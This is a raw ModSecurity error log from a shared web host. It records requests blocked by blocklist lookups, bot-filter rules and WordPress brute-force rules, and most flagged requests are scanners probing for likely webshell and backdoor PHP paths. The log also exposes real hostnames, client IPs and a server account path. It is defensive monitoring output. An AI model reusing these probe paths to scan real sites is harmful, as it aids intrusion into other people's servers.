[Tue May 26 18:03:50.605403 2026] [security2:error] [pid 960743:tid 960974] [client 185.192.70.94:32357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahWTLvQvEln_BHBy2zJtMQAAAOo"]
[Tue May 26 18:03:50.676301 2026] [security2:error] [pid 960743:tid 960850] [remote 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ndequipments.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWTLvQvEln_BHBy2zJtNQAA2mo"]
[Tue May 26 18:03:50.799236 2026] [security2:error] [pid 960743:tid 960916] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTLvQvEln_BHBy2zJtKQAAALA"]
[Tue May 26 18:03:51.035894 2026] [security2:error] [pid 960743:tid 960851] [remote 2.58.56.163:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWTLvQvEln_BHBy2zJtPAAAqWs"]
[Tue May 26 18:03:51.184953 2026] [security2:error] [pid 960743:tid 960876] [client 74.7.230.1:47886] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dnvexpress.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWTL_QvEln_BHBy2zJtQAAAiG0"]
[Tue May 26 18:03:51.239903 2026] [security2:error] [pid 960743:tid 960893] [client 74.7.228.13:50060] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dnvexpress.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWTL_QvEln_BHBy2zJtQQAAmW8"]
[Tue May 26 18:03:51.533868 2026] [security2:error] [pid 960743:tid 960889] [client 185.192.70.89:63719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 89.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/envato-css.php"] [unique_id "ahWTL_QvEln_BHBy2zJtSgAAAJU"]
[Tue May 26 18:03:52.532404 2026] [security2:error] [pid 960743:tid 960867] [remote 2.58.56.163:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWTMPQvEln_BHBy2zJtagAA-Xs"]
[Tue May 26 18:03:52.532580 2026] [security2:error] [pid 960743:tid 960989] [client 2.58.56.163:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWTMPQvEln_BHBy2zJtagAA-Xs"]
[Tue May 26 18:03:53.090367 2026] [security2:error] [pid 960743:tid 960877] [client 45.79.5.11:40035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "pronumbers.com.au"] [uri "/400.shtml"] [unique_id "ahWTMfQvEln_BHBy2zJteAAAAIk"]
[Tue May 26 18:03:53.168905 2026] [security2:error] [pid 960743:tid 960882] [client 185.192.70.88:50925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/classwithtostring.php"] [unique_id "ahWTMfQvEln_BHBy2zJtewAAAI4"]
[Tue May 26 18:03:53.278023 2026] [security2:error] [pid 960743:tid 960976] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTMPQvEln_BHBy2zJtdAAAAOw"]
[Tue May 26 18:03:53.789022 2026] [security2:error] [pid 960743:tid 960912] [client 2.58.56.163:60395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWTMfQvEln_BHBy2zJtiQAAAKw"]
[Tue May 26 18:03:53.789159 2026] [security2:error] [pid 960743:tid 960912] [client 2.58.56.163:60395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "koneksi.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWTMfQvEln_BHBy2zJtiQAAAKw"]
[Tue May 26 18:03:54.520031 2026] [security2:error] [pid 960743:tid 960890] [client 185.192.70.75:51097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/index/function.php"] [unique_id "ahWTMvQvEln_BHBy2zJtlQAAAJY"]
[Tue May 26 18:03:54.549340 2026] [security2:error] [pid 960743:tid 960745] [remote 41.111.171.131:58106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTMvQvEln_BHBy2zJtkgAAzAE"]
[Tue May 26 18:03:54.831249 2026] [security2:error] [pid 960743:tid 960928] [client 178.20.210.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTMvQvEln_BHBy2zJtlgAAALw"]
[Tue May 26 18:03:55.551429 2026] [security2:error] [pid 960743:tid 960897] [client 178.20.210.56:20958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTM_QvEln_BHBy2zJtoQAAnQQ"]
[Tue May 26 18:03:55.568169 2026] [security2:error] [pid 960743:tid 960958] [client 185.192.70.98:64229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/tinyfilemanager.php"] [unique_id "ahWTM_QvEln_BHBy2zJtqgAAANo"]
[Tue May 26 18:03:55.987974 2026] [security2:error] [pid 960743:tid 960901] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTM_QvEln_BHBy2zJtrQAAAKE"]
[Tue May 26 18:03:56.983025 2026] [security2:error] [pid 960743:tid 960991] [client 34.41.98.139:64606] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWTNPQvEln_BHBy2zJtwAAAAPs"]
[Tue May 26 18:03:57.281636 2026] [security2:error] [pid 960743:tid 960941] [client 185.192.70.80:62635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/js/bas.php"] [unique_id "ahWTNfQvEln_BHBy2zJtwQAAAMk"]
[Tue May 26 18:03:58.182682 2026] [security2:error] [pid 960743:tid 960939] [client 82.76.238.33:61101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTNvQvEln_BHBy2zJtzgAAAMc"]
[Tue May 26 18:03:58.182825 2026] [security2:error] [pid 960743:tid 960939] [client 82.76.238.33:61101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTNvQvEln_BHBy2zJtzgAAAMc"]
[Tue May 26 18:03:58.277168 2026] [security2:error] [pid 960743:tid 960898] [client 185.192.70.71:52917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/pki-validation/moon.php"] [unique_id "ahWTNvQvEln_BHBy2zJtzwAAAJ4"]
[Tue May 26 18:03:59.057667 2026] [security2:error] [pid 960743:tid 960981] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTNvQvEln_BHBy2zJt2AAAAPE"]
[Tue May 26 18:03:59.800395 2026] [security2:error] [pid 960743:tid 960920] [client 49.245.63.150:60694] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWTN_QvEln_BHBy2zJt3wAAALQ"]
[Tue May 26 18:04:00.176351 2026] [security2:error] [pid 960743:tid 960893] [client 185.192.70.86:64067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/file.php"] [unique_id "ahWTOPQvEln_BHBy2zJt-AAAAJk"]
[Tue May 26 18:04:00.788577 2026] [security2:error] [pid 960743:tid 960896] [client 34.41.98.139:49651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.98.41.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWTOPQvEln_BHBy2zJuBAAAAJw"]
[Tue May 26 18:04:00.788751 2026] [security2:error] [pid 960743:tid 960896] [client 34.41.98.139:49651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWTOPQvEln_BHBy2zJuBAAAAJw"]
[Tue May 26 18:04:01.637208 2026] [security2:error] [pid 960743:tid 960897] [client 104.28.71.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWTOfQvEln_BHBy2zJuFwAAAJ0"]
[Tue May 26 18:04:01.821377 2026] [security2:error] [pid 960743:tid 960984] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTOfQvEln_BHBy2zJuFAAAAPQ"]
[Tue May 26 18:04:02.462207 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.72:30791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/js/index.php"] [unique_id "ahWTOvQvEln_BHBy2zJuKgAAALA"]
[Tue May 26 18:04:03.471395 2026] [security2:error] [pid 960743:tid 960905] [client 185.192.70.95:41199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/upgrade/item.php"] [unique_id "ahWTO_QvEln_BHBy2zJuQAAAAKU"]
[Tue May 26 18:04:03.771957 2026] [security2:error] [pid 960743:tid 960890] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTO_QvEln_BHBy2zJuPwAAAJY"]
[Tue May 26 18:04:04.509799 2026] [security2:error] [pid 960743:tid 960993] [client 185.192.70.93:62767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/buy.php"] [unique_id "ahWTPPQvEln_BHBy2zJuUwAAAP0"]
[Tue May 26 18:04:05.528609 2026] [security2:error] [pid 960743:tid 960915] [client 185.192.70.97:50303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/languages/wp-conflg.php"] [unique_id "ahWTPfQvEln_BHBy2zJuXwAAAK8"]
[Tue May 26 18:04:05.663979 2026] [security2:error] [pid 960743:tid 960973] [client 68.67.112.95:31061] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWTPfQvEln_BHBy2zJuYAAAAOk"]
[Tue May 26 18:04:06.403912 2026] [security2:error] [pid 960743:tid 960970] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTPfQvEln_BHBy2zJuZgAAAOY"]
[Tue May 26 18:04:06.787108 2026] [security2:error] [pid 960743:tid 960906] [client 185.192.70.99:54567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/classwithtostring.php"] [unique_id "ahWTPvQvEln_BHBy2zJuegAAAKY"]
[Tue May 26 18:04:07.136230 2026] [security2:error] [pid 960743:tid 960905] [client 85.208.96.209:62314] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWTP_QvEln_BHBy2zJuhAAAAKU"]
[Tue May 26 18:04:07.136405 2026] [security2:error] [pid 960743:tid 960905] [client 85.208.96.209:62314] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWTP_QvEln_BHBy2zJuhAAAAKU"]
[Tue May 26 18:04:07.793196 2026] [security2:error] [pid 960743:tid 960993] [client 185.192.70.99:46081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/elementor/wp-wjvngrh.php"] [unique_id "ahWTP_QvEln_BHBy2zJukgAAAP0"]
[Tue May 26 18:04:08.058822 2026] [security2:error] [pid 960743:tid 960764] [remote 160.250.186.220:45904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTP_QvEln_BHBy2zJulgAA0hQ"]
[Tue May 26 18:04:08.406706 2026] [security2:error] [pid 960743:tid 960985] [client 82.76.238.33:61524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTQPQvEln_BHBy2zJuowAAAPU"]
[Tue May 26 18:04:08.406843 2026] [security2:error] [pid 960743:tid 960985] [client 82.76.238.33:61524] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTQPQvEln_BHBy2zJuowAAAPU"]
[Tue May 26 18:04:08.866344 2026] [security2:error] [pid 960743:tid 960967] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTQPQvEln_BHBy2zJupgAAAOM"]
[Tue May 26 18:04:09.695848 2026] [security2:error] [pid 960743:tid 960982] [client 176.31.139.25:53572] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "valodico.com"] [uri "/robots.txt"] [unique_id "ahWTQfQvEln_BHBy2zJuvAAAAPI"]
[Tue May 26 18:04:09.695957 2026] [security2:error] [pid 960743:tid 960982] [client 176.31.139.25:53572] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "valodico.com"] [uri "/robots.txt"] [unique_id "ahWTQfQvEln_BHBy2zJuvAAAAPI"]
[Tue May 26 18:04:10.124578 2026] [security2:error] [pid 960743:tid 960782] [remote 74.7.241.58:52582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWTQvQvEln_BHBy2zJuyAAAlCY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:04:10.302598 2026] [security2:error] [pid 960743:tid 960990] [client 185.192.70.4:30775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/IXR/fix.php7"] [unique_id "ahWTQvQvEln_BHBy2zJuyQAAAPo"]
[Tue May 26 18:04:10.556334 2026] [security2:error] [pid 960743:tid 960950] [client 136.243.228.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTQvQvEln_BHBy2zJu0wAAANI"]
[Tue May 26 18:04:10.985688 2026] [security2:error] [pid 960743:tid 960944] [client 74.7.175.150:33690] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahWTQvQvEln_BHBy2zJu2gAAzC4"]
[Tue May 26 18:04:11.148757 2026] [security2:error] [pid 960743:tid 960894] [client 54.39.136.158:54684] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "valodico.com"] [uri "/"] [unique_id "ahWTQ_QvEln_BHBy2zJu2wAAAJo"]
[Tue May 26 18:04:11.148893 2026] [security2:error] [pid 960743:tid 960894] [client 54.39.136.158:54684] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "valodico.com"] [uri "/"] [unique_id "ahWTQ_QvEln_BHBy2zJu2wAAAJo"]
[Tue May 26 18:04:11.789305 2026] [security2:error] [pid 960743:tid 960793] [remote 35.176.253.230:54972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTQ_QvEln_BHBy2zJu4wAAnTE"]
[Tue May 26 18:04:12.016091 2026] [security2:error] [pid 960743:tid 960797] [remote 35.176.253.230:54972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTQ_QvEln_BHBy2zJu6wABBDU"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:04:12.254427 2026] [security2:error] [pid 960743:tid 960904] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTQ_QvEln_BHBy2zJu5wAAAKQ"]
[Tue May 26 18:04:13.189186 2026] [security2:error] [pid 960743:tid 960965] [client 185.192.70.78:56343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/widgets/dyqvcfqv.php"] [unique_id "ahWTRfQvEln_BHBy2zJu9gAAAOE"]
[Tue May 26 18:04:14.605703 2026] [security2:error] [pid 960743:tid 960944] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTRvQvEln_BHBy2zJvEgAAAMw"]
[Tue May 26 18:04:15.305818 2026] [security2:error] [pid 960743:tid 960998] [client 185.192.70.100:47003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/admin/function.php"] [unique_id "ahWTR_QvEln_BHBy2zJvLgAAAQI"]
[Tue May 26 18:04:15.934962 2026] [security2:error] [pid 960743:tid 960947] [client 155.117.163.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWTR_QvEln_BHBy2zJvOgAAAM8"], referer: https://earthone.me/
